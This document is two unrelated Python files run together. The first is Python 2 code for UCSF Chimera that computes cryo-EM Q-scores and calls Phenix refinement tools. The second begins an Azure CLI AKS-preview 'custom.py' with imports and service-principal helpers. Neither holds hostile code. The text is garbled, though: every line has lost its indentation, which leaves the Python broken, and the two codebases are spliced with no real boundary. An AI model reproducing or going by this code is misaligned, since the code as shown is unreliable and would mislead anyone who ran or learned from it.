numRes = len(rscores)
rts = ""
if R.isProt : rts = protein3to1[rtype]
else : rts = nucleic3to1[rtype]
print "%s\t%s\t%d\t%f\t%d\t.%s\t%f" % (rtype, rts, numRes, avgScore, R.id.position, R.id.chainId, highestScore)
fp.write ( "%s\t%s\t%d\t%f\t%d\t.%s\t%f\n" % (rtype, rts, numRes, avgScore, R.id.position, R.id.chainId, highestScore) )
fp.close()
return numpy.average(scoresBB), numpy.average(scoresSC)
def CalcResQ (r, dmap, sigma, allAtTree=None, numPts=8, toRAD=2.0, dRAD=0.1, minD=0.0, maxD=1.0, useOld=False ) :
scQ, bbQ, Q, numSC, numBB = 0.0, 0.0, 0.0, 0.0, 0.0
for at in r.atoms :
if at.element.name == "H" :
continue
if not hasattr ( at, 'isBB' ) :
SetBBAts ( at.molecule )
if not hasattr ( at, 'Q' ) or not useOld :
#qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=numPts, toRAD=toRAD, dRAD=dRAD, minD=minD, maxD=maxD )
at.Q = 0
at.CC = 0
Q += at.Q
if r.isProt or r.isNA :
if at.isBB :
bbQ += at.Q
numBB += 1.0
else :
scQ += at.Q
numSC += 1.0
if r.isProt or r.isNA :
if int(numSC) != len(r.scAtoms) :
print " - res %d.%s.%s - %.0f/%d sc atoms" % (r.id.position,r.type,r.id.chainId, numSC, len(r.scAtoms))
if numSC > 0 :
r.scQ = scQ / numSC
else :
r.scQ = None
if numBB > 0 :
r.bbQ = bbQ / numBB
else :
r.bbQ = None
r.Q = Q / float ( len(r.atoms) )
def CalcQ_ ( mol, cid, dmap, sigma=0.5, allAtTree=None, useOld=False, log=False ) :
print "Q Scores - in parallel"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
ress = []
for r in mol.residues :
if cid == None or r.id.chainId == cid :
ress.append ( r )
print " - residues to do: %d" % len(ress)
import multiprocessing
threads = multiprocessing.cpu_count() / 2
print 'calc q using %d threads' % threads
# Avoid periodic Python context switching.
import sys
original_check_interval = sys.getcheckinterval()
sys.setcheckinterval(1000000000)
# Define thread class for fitting.
from threading import Thread
class Q_Thread(Thread):
def __init__(self, ress, ti):
Thread.__init__(self)
self.ress = ress
self.ti = ti
def run(self):
print "run - %d - %d" % (self.ti, len(ress))
for ri, r in enumerate ( self.ress ) :
#CalcResQ (r, dmap, sigma, allAtTree=allAtTree, numPts=2, toRAD=2.0, dRAD=0.2 )
#print "%d-%d/%d" % (ti,ri/len(self.ress)),
for at in r.atoms :
if at.element.name != "H" :
qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.5 )
# Starts threads with each calculating an equal number of fits.
n = len(ress)
g = [ress[(n*c)/threads:(n*(c+1))/threads] for c in range(threads)]
threads = []
for mi, ml in enumerate(g) :
#print "%d - %d, %d-%d" % (mi,len(ml),ml[0].id.position,ml[-1].id.position)
t = Q_Thread(ml,mi)
threads.append(t)
for t in threads:
t.start()
print ""
# Wait for all threads to finish
for t in threads:
t.join()
# Restore periodic context switching.
sys.setcheckinterval(original_check_interval)
# Collect fit results from all threads.
#for t in threads:
# print "",
def CalcQ ( mol, cid, dmap, sigma, allAtTree=None, useOld=False, log=False ) :
minD, maxD = MinMaxD ( dmap )
print ""
print "Q Scores"
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
print " - sigma: %.2f" % sigma
print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
SetBBAts ( mol )
atoms = []
import time
start = time.time()
#ress = []
for r in mol.residues :
if cid == None or cid == "All" or r.id.chainId == cid :
for at in r.atoms :
if at.element.name == "H" :
continue
atoms.append ( at )
print " - atoms to do: %d" % len(atoms)
#for ai, at in enumerate ( atoms[0:2] ) :
# qs = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
from chimera import tasks, CancelOperation
task = tasks.Task('Calculating Q-scores', modal = True)
try :
for ai, at in enumerate ( atoms ) :
at.Q = Qscore ( [at], dmap, sigma, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
at.bfactor = at.Q
end = time.time()
totSec = end - start
leftTime = ""
leftSec = 0.0
iPerSec = float(ai) / totSec
if iPerSec > 0 :
leftSec = float ( len(atoms) - ai ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
if (ai+1) % 100 == 0 :
if log :
print "Calculating Q scores - atom %d/%d - eta: %s" % (ai+1, len(atoms), leftTime)
task.updateStatus( "Calculating Q scores - atom %d/%d - eta: %s" % (ai+1, len(atoms), leftTime) )
except :
print " - something went wrong..."
return None
finally :
task.finished()
end = time.time()
print ""
print " - done, time: %f" % ( end-start )
totSec = end - start
totMin = numpy.floor ( totSec / 60.0 )
totSec = totSec - totMin * 60.0
print " - done, time: %.0f min, %.1f sec" % ( totMin, totSec )
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
try :
nname = molPath + "__Q__" + mapName + ".pdb"
chimera.PDBio().writePDBfile ( [mol], nname )
print " - saved %s with Q-scores in O column" % nname
except :
print " - could not save Q-scores file"
pass
Qavg = QStats1 ( mol, cid )
return Qavg
def QsFromFile ( mol, nname ) :
rids = {}
for r in mol.residues :
rids["%d.%s" % (r.id.position,r.id.chainId)] = r
# http://www.wwpdb.org/documentation/file-format-content/format33/sect9.html#ATOM
try :
fin = open ( nname, "r" )
except :
#print " - file not found"
return False
print " - Qs from file: %s" % nname
for line in fin :
if line[0:4] == "ATOM" or line[0:6] == "HETATM" :
aname, aloc, cid, resi, occ, bfac = line[12:16].strip(), line[16:17].strip(), line[21], int(line[22:26]), float ( line[54:60] ), float ( line[60:66] )
#if occ < 1.0 :
rid = "%s.%s" % (resi,cid)
if rid in rids :
r = rids[rid]
if aname in r.atomsMap :
ats = r.atomsMap[aname]
found = False
for at in ats :
if at.altLoc == aloc :
at.Q = bfac
at.bfactor = at.Q
#at.bfactor = 100.0 * (1.0 - at.Q)
found = True
if not found :
#print " -xx- %s.%s - atom %s - loc %s" % (resi, cid, aname, aloc)
continue
else :
#print " -xx- %s.%s - atom %s" % (resi,cid, aname)
continue
fin.close ()
return True
def QScoreFileName ( mol, dmap ) :
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
return nname
def AddSpherePts ( pts, clr, rad, mname = "RAD points" ) :
from chimera import elements, Coord, Atom, MolResId
ptsMol = GetMod ( mname )
res = None
if ptsMol == None:
from chimera import Molecule, openModels
ptsMol = Molecule()
ptsMol.name = mname
ptsMol.isRealMolecule = False
openModels.add ( [ptsMol], noprefs = True )
res = ptsMol.newResidue('marker', chimera.MolResId('1', 1) )
else :
res = ptsMol.residues[0]
for pt in pts :
a = ptsMol.newAtom('', elements.H)
res.addAtom(a)
a.setCoord ( chimera.Point(*pt) ) # ( chimera.Point(*xyz) )
a.radius = rad
a.drawMode = Atom.Sphere
a.color = chimera.MaterialColor ( *clr )
a.surfaceCategory = 'markers'
def SpherePts ( ctr, rad, N ) :
thetas, phis = [], []
from math import acos, sin, cos, sqrt, pi
for k in range ( 1, N+1 ) :
h = -1.0 + ( 2.0*float(k-1)/float(N-1) )
phis.append ( acos(h) )
thetas.append ( 0 if k == 1 or k == N else
(thetas[k-2] + 3.6/sqrt(N*(1.0-h**2.0))) % (2*pi) )
pts = [None] * N
for i, theta, phi in zip ( range(N), thetas, phis ):
v = chimera.Vector (sin(phi)*cos(theta), sin(phi)*sin(theta), cos(phi))
#if numpy.abs ( v.length - 1.0 ) > 1e-3 :
# print "x"
pt = ctr + v * rad
pts[i] = pt
return pts
import threading
def Calc_ ( label="", res=0.0 ) :
print "Calc Q scores:", label
from VolumeViewer import Volume
vols = chimera.openModels.list(modelTypes = [Volume])
if len(vols) == 0 :
print " - no volumes loaded"
return
dmap = vols[0]
print " - dmap: %s" % dmap.name
print " - res: %s" % res
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mols = chimera.openModels.list(modelTypes = [Molecule])
if len(mols) == 0 :
print " - no molecules loaded"
return
mol = mols[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
#allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
allAtTree = None
qs, dr, q, qcc, emr = 0,0,0,0,0
#bbRadZ, scRadZ, scRotaZ = 0,0,0
sigma = 0.4
cid = None
#cid = mol.residues[0].id.chainId
qs = CalcQp ( mol, cid, dmap, sigma=sigma, allAtTree=allAtTree, useOld=False )
print ""
print "Avg. Q scores:"
print ""
tps = qs.keys()
tps.sort()
for tp in tps :
print " - %s : %.2f" % (tp, qs[tp])
print ""
if 1 :
at = 30
fp = None
if os.path.isdir("/Users/greg/Dropbox/_mapsq") :
fp = open ( "/Users/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
elif os.path.isdir("/home/greg/Dropbox/_mapsq") :
fp = open ( "/home/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
elif os.path.isdir("C:/Users/greg/Dropbox/_mapsq") :
fp = open ( "C:/Users/greg/Dropbox/_mapsq/scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
else :
fp = open ( "scores%d_Q_allc_%s_sig%.0f.txt" % (at, label, sigma*100.0), "a" )
fp.write ( "%s\t%s\t%s" % (dmap.name, mol.name, res) )
for tp in tps :
fp.write ( "\t%s\t%.2f" % (tp, qs[tp]) )
fp.write ( "\n" )
#nProt = len ( [at for at in mol.atoms if at.residue.isProt == True] )
#nNA = len ( [at for at in mol.atoms if at.residue.isNA == True] )
#fp.write ( "%s\t%s\t%s\t%d\t%d\n" % (dmap.name, mol.name, res, nProt, nNA) )
fp.close ()
def emringer ( dmap, mol ) :
print "----- %s ____________ EMRINGER ____________ %s -----" % (dmap.name, mol.name)
cdir = os.getcwd()
print " - now in: ", cdir
#print " - splitting " + mol.openedAs[0]
mpath, mname = os.path.split ( mol.openedAs[0] )
dpath, dname = os.path.split ( dmap.data.path )
bs = os.path.splitext ( mol.openedAs[0] )[0]
print " - copying mol file... removes symmetry/connect stuff"
fin = open ( mol.openedAs[0], "r" )
fout = open ( bs + "_.pdb", "w" )
for line in fin :
if "ATOM" in line or "HETATM" in line :
fout.write ( line )
fin.close ()
fout.close ()
phPath = "/Users/greg/_mol/phenix-1.14-3260/build/bin/"
#phPath = "/Users/greg/_mol/phenix-1.15rc3-3435/build/bin/"
args = [phPath+'phenix.emringer', dmap.data.path, bs+"_.pdb" ]
print "running: ",
for arg in args : print arg,
print ""
outf = mpath + '/' + '_out.txt'
errf = mpath + '/' + '_err.txt'
fout = open ( outf, "w" )
ferr = open ( errf, "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, stderr=ferr, cwd=mpath)
p.wait()
fout.close()
ferr.close()
print " - getting score from " + outf
score = -100
fin = open ( outf )
for l in fin :
if "EMRinger Score:" in l :
s = l [ len("EMRinger Score:")+1 : ]
print "Score: ", s
score = float( s )
print " - found score: %.3f" % score
print " - removing ", bs + "_.pdb"
import shutil
try :
os.remove ( bs + "_.pdb" )
os.remove ( bs + "__emringer.pkl" )
os.remove ( bs + "__emringer.csv" )
shutil.rmtree ( bs + "__emringer_plots" )
print " - done"
except :
print " -- did not find"
return score
def refine ( dmap, mol, res ) :
print "----- %s ____________ REFINE ____________ %s -----" % (dmap.name, mol.name)
cdir = os.getcwd()
print " - now in: ", cdir
#print " - splitting " + mol.openedAs[0]
mpath, mname = os.path.split ( mol.openedAs[0] )
dpath, dname = os.path.split ( dmap.data.path )
bs = os.path.splitext ( mol.openedAs[0] )[0]
print " - copying mol file... removes symmetry/connect stuff"
fin = open ( mol.openedAs[0], "r" )
fout = open ( bs + "_.pdb", "w" )
for line in fin :
if "ATOM" in line or "HETATM" in line :
fout.write ( line )
fin.close ()
fout.close ()
phPath = "/Users/greg/_mol/phenix-1.14-3260/build/bin/"
phPath = "/Users/greg/_mol/phenix-1.15rc3-3435/build/bin/"
args = [phPath+'phenix.real_space_refine', dmap.data.path, bs+"_.pdb", "resolution=%.1f"%res ]
print "running: ",
for arg in args : print arg,
print ""
outf = mpath + '/' + '_out.txt'
errf = mpath + '/' + '_err.txt'
fout = open ( outf, "w" )
ferr = open ( errf, "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, stderr=ferr, cwd=mpath)
p.wait()
fout.close()
ferr.close()
print " - getting score from " + outf
score = -100
fin = open ( outf )
for l in fin :
if "EMRinger Score:" in l :
s = l [ len("EMRinger Score:")+1 : ]
print "Score: ", s
score = float( s )
print " - found score: %.3f" % score
print " - removing ", bs + "_.pdb"
import shutil
try :
os.remove ( bs + "_.pdb" )
os.remove ( bs + "__emringer.pkl" )
os.remove ( bs + "__emringer.csv" )
shutil.rmtree ( bs + "__emringer_plots" )
print " - done"
except :
print " -- did not find"
return score
def refdir ( rdir ) :
print "Refining in", rdir
def CalcR_ ( label = "" ) :
print "Calc all scores -", label
from VolumeViewer import Volume
dmap = chimera.openModels.list(modelTypes = [Volume])[0]
print " - dmap: %s" % dmap.name
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mol = chimera.openModels.list(modelTypes = [Molecule])[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
mapName = os.path.splitext(dmap.name)[0]
molName = os.path.splitext(mol.name)[0]
ddir, dfile = os.path.split(dmap.data.path)
molFile = mol.openedAs[0]
mdir, mfile = os.path.split(molFile)
print "PhFmap -- " + molFile
RES = 3.0
print " -- res %.1f -- " % RES
outFile = molFile + "_r%.0f" % RES + "_fmodel.ccp4"
if not os.path.isfile ( outFile ) :
phPath = "/usr/local/phenix-1.14-3260/build/bin/"
args = [phPath+'phenix.fmodel', "high_resolution=%.1f"%RES, "scattering_table=electron", "generate_fake_p1_symmetry=True", molFile ]
print "running: ",
for arg in args : print arg,
print ""
fout = open ( mdir + '/' + '_0_fmodel.log', "w" )
import subprocess
p = subprocess.Popen(args, stdout=fout, cwd=mdir)
p.wait()
fout.close()
print ""
args = [phPath+'phenix.mtz2map', "high_resolution=%.1f"%RES, "include_fmodel=true", "scattering_table=electron", molFile, molFile + ".mtz" ]
print "running: ",
for arg in args : print arg,
print ""
fout = open ( mdir + '/' + '_1_mtz2map.log', "w" )
p = subprocess.Popen(args, stdout=fout, cwd=mdir)
p.wait()
fout.close()
print " - renaming to:", outFile
os.rename( molFile + "_fmodel.ccp4", outFile )
os.remove( molFile + ".mtz" )
print " - loading map:", outFile
dm = chimera.openModels.open ( outFile )[0]
molg = MyMolMapX ( mol, mol.atoms, RES, dmap.data.step[0], chimera.Xform.identity() )
fpoints, fpoint_weights = fit_points_g ( molg, 0.1 )
map_values = dmap.interpolated_values ( fpoints, mol.openState.xform )
mmolap, mmcorr1, mmcorr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
print "Molmap - olap: %f, CC: %f, CCm: %f" % (mmolap, mmcorr1, mmcorr2)
fpoints, fpoint_weights = fit_points_g ( dm.data, 5.0 )
map_values = dmap.interpolated_values ( fpoints, dm.openState.xform )
olap, phcorr1, phcorr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
print "Phenix - olap: %f, CC: %f, CCm: %f" % (olap, phcorr1, phcorr2)
#fpoints, fpoint_weights = fit_points_g ( dmap.data, -1e6 )
#map_values = dm.interpolated_values ( fpoints, dmap.openState.xform )
#olap, corr1, corr2 = FitMap.overlap_and_correlation ( fpoint_weights, map_values )
#print "Phenix - olap: %f, CC: %f, CCm: %f" % (olap, corr1, corr2)
print "%f\t%f\t%f\t%f" % (mmcorr1, mmcorr2, phcorr1, phcorr2)
fp = open ( "/Users/greg/Dropbox/_mapsq/scores3_R_%s.txt" % label, "a" )
fp.write ( "%s\t%f\t%f\t%f\t%f\n" % (dmap.name.split("_")[0], mmcorr1, mmcorr2, phcorr1, phcorr2) )
fp.close ()
def MaskMapResize ( atoms, R, dmap, fout=None ) :
import _multiscale
import _contour
import _volume
from _contour import affine_transform_vertices as transform_vertices
from VolumeData import grid_indices, zone_masked_grid_data, interpolate_volume_data
points = _multiscale.get_atom_coordinates ( atoms, transformed = True )
#print " %d points" % len(points)
fpoints = points
if 0 :
_contour.affine_transform_vertices ( points, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
mdata = VolumeData.zone_masked_grid_data ( dmap.data, points, R )
#mdata = VolumeData.Array_Grid_Data ( mdata.full_matrix(), dmap.data.origin, dmap.data.step, dmap.data.cell_angles, name = "atom masked" )
mat = mdata.full_matrix()
threshold = 1e-3
points = _volume.high_indices(mat, threshold)
fpoints = points.astype(numpy.single)
fpoint_weights = mat[points[:,2],points[:,1],points[:,0]]
#print " %d points" % len(points)
nz = numpy.nonzero( fpoint_weights )[0]
#print " %d pts nonzero" % len(nz)
if len(nz) > 0 and len(nz) < len (fpoint_weights) :
fpoints = numpy.take( fpoints, nz, axis=0 )
fpoint_weights = numpy.take(fpoint_weights, nz, axis=0)
else :
_contour.affine_transform_vertices ( fpoints, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
#transform_vertices( fpoints, dmap.data.ijk_to_xyz_transform )
transform_vertices( fpoints, dmap.data.xyz_to_ijk_transform )
#print " - %s mask %d atoms, %d nonzero points" % ( dmap.name, len(atoms), len(nz) )
#transform_vertices( fpoints, Matrix.xform_matrix( fmap.openState.xform ) )
#transform_vertices( fpoints, Matrix.xform_matrix( dmap.openState.xform.inverse() ) )
#transform_vertices ( fpoints, dmap.data.xyz_to_ijk_transform )
bound = 6
li,lj,lk = numpy.min ( fpoints, axis=0 ) - (bound, bound, bound)
hi,hj,hk = numpy.max ( fpoints, axis=0 ) + (bound, bound, bound)
n1 = hi - li + 1
n2 = hj - lj + 1
n3 = hk - lk + 1
#print " - bounds - %d %d %d --> %d %d %d --> %d %d %d" % ( li, lj, lk, hi, hj, hk, n1,n2,n3 )
#nmat = numpy.zeros ( (n1,n2,n3), numpy.float32 )
#dmat = dmap.full_matrix()
nstep = (dmap.data.step[0], dmap.data.step[1], dmap.data.step[2] )
nn1 = int ( round (dmap.data.step[0] * float(n1) / nstep[0]) )
nn2 = int ( round (dmap.data.step[1] * float(n2) / nstep[1]) )
nn3 = int ( round (dmap.data.step[2] * float(n3) / nstep[2]) )
O = dmap.data.origin
#print " - %s origin:" % dmap.name, O
nO = ( O[0] + float(li) * dmap.data.step[0],
O[1] + float(lj) * dmap.data.step[1],
O[2] + float(lk) * dmap.data.step[2] )
#print " - new map origin:", nO
ox = round ( nO[0]/dmap.data.step[0] ) * dmap.data.step[0]
oy = round ( nO[1]/dmap.data.step[1] ) * dmap.data.step[1]
oz = round ( nO[2]/dmap.data.step[2] ) * dmap.data.step[2]
nO = ( ox, oy, oz )
#print " - new map origin:", nO
nmat = numpy.zeros ( (nn1,nn2,nn3), numpy.float32 )
ndata = VolumeData.Array_Grid_Data ( nmat, nO, nstep, dmap.data.cell_angles )
npoints = grid_indices ( (nn1, nn2, nn3), numpy.single) # i,j,k indices
transform_vertices ( npoints, ndata.ijk_to_xyz_transform )
dvals = dmap.interpolated_values ( npoints, dmap.openState.xform )
#dvals = numpy.where ( dvals > threshold, dvals, numpy.zeros_like(dvals) )
#nze = numpy.nonzero ( dvals )
nmat = dvals.reshape( (nn3,nn2,nn1) )
ndata = VolumeData.Array_Grid_Data ( nmat, nO, nstep, dmap.data.cell_angles )
if fout == None :
try : nv = VolumeViewer.volume.add_data_set ( ndata, None )
except : nv = VolumeViewer.volume.volume_from_grid_data ( ndata )
dmap_base = os.path.splitext(dmap.name)[0]
dmap_path = os.path.splitext (dmap.data.path)[0]
nv.name = dmap_base + "_masked"
nv.openState.xform = dmap.openState.xform
return nv
else :
from VolumeData import save_grid_data
#d = self.grid_data()
format = save_grid_data(ndata, fout, None, {}, False)
#print " - saved data"
def SetBBAts ( mol ) :
#if hasattr ( mol, "bbats" ) :
# return
#mol.bbats = True
#print " - setting bbAts in %s" % mol.name
for r in mol.residues :
#r.isProt = "C" in r.atomsMap and "CA" in r.atomsMap and "N" in r.atomsMap
#r.isProt = "CA" in r.atomsMap
#r.isNA = "O3'" in r.atomsMap and "O5'" in r.atomsMap
from chimera.resCode import nucleic3to1
from chimera.resCode import protein3to1
protein3to1['HSD'] = protein3to1['HIS']
protein3to1['HSE'] = protein3to1['HIS']
r.isProt = r.type in protein3to1
r.isNA = r.type in nucleic3to1
r.score1 = None
r.score2 = None
if r.isProt :
r.rtype = "prot"
elif r.isNA :
r.rtype = "na"
else :
r.rtype = "?"
if r.isNA :
try :
if nucleic3to1[r.type] == "G" :
r.baseAt = r.atomsMap["N9"][0]
elif nucleic3to1[r.type] == "C" :
r.baseAt = r.atomsMap["N1"][0]
elif nucleic3to1[r.type] == "A" :
r.baseAt = r.atomsMap["N9"][0]
elif nucleic3to1[r.type] == "U" :
r.baseAt = r.atomsMap["N1"][0]
except :
#print " - baseAt not found - "
pass
r.bbAtoms = []
r.scAtoms = []
if r.isProt :
for a in r.atoms :
if a.element.name == "H" :
a.isBB, a.isSC = False, False
continue
n = a.name
a.isBB = n=="C" or n=="CA" or n=="O" or n=="N" or n=="OT1" or n=="OT2"
a.isSC = not a.isBB
if a.isBB :
r.bbAtoms.append ( a )
else :
r.scAtoms.append ( a )
a.isSugar, a.isBase = False, False
elif r.isNA :
for a in r.atoms :
if a.element.name == "H" :
a.isBB, a.isSC = False, False
continue
n = a.name
a.isBB = n=="P" or n=="O1P" or n=="O2P" or n=="OP1" or n=="OP2" or n=="O5'" or n=="C5'" or n=="O3'"
a.isSugar = n=="C1'" or n=="C2'" or n=="O4'" or n=="O2'" or n=="C3'" or n=="C4'"
a.isBB = a.isBB or a.isSugar
a.isBase = not a.isBB
if nucleic3to1[r.type] == "G" :
a.isBase = n=="N9" or n=="C8" or n=="N7" or n=="C5" or n=="C4" or n=="C6" or n=="O6" or n=="N1" or n=="C2" or n=="N2" or n=="N3"
elif nucleic3to1[r.type] == "C" :
a.isBase = n=="N1" or n=="C2" or n=="O2" or n=="N3" or n=="C4" or n=="N4" or n=="C5" or n=="C6"
elif nucleic3to1[r.type] == "A" :
a.isBase = n=="N9" or n=="C8" or n=="N7" or n=="C5" or n=="C4" or n=="N3" or n=="C2" or n=="N1" or n=="C6" or n=="N6"
elif nucleic3to1[r.type] == "U" :
a.isBase = n=="N1" or n=="C2" or n=="O2" or n=="N3" or n=="C4" or n=="O4" or n=="C5" or n=="C6"
else :
#print " -x- NA res %d.%s is ?" % (r.id.position, r.type)
break
a.isSC = a.isBase
#if nucleic3to1[r.type] == "G" :
# r.isBase = n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n=="" or n="" or n="" or n=""
# r.baseAt = r.atomsMap["N9"][0]
if a.isBB :
r.bbAtoms.append ( a )
else :
r.scAtoms.append ( a )
else :
for a in r.atoms :
a.isBB, a.isSC, a.isSugar, a.isBase = False, False, False, False
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2021_11_01_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
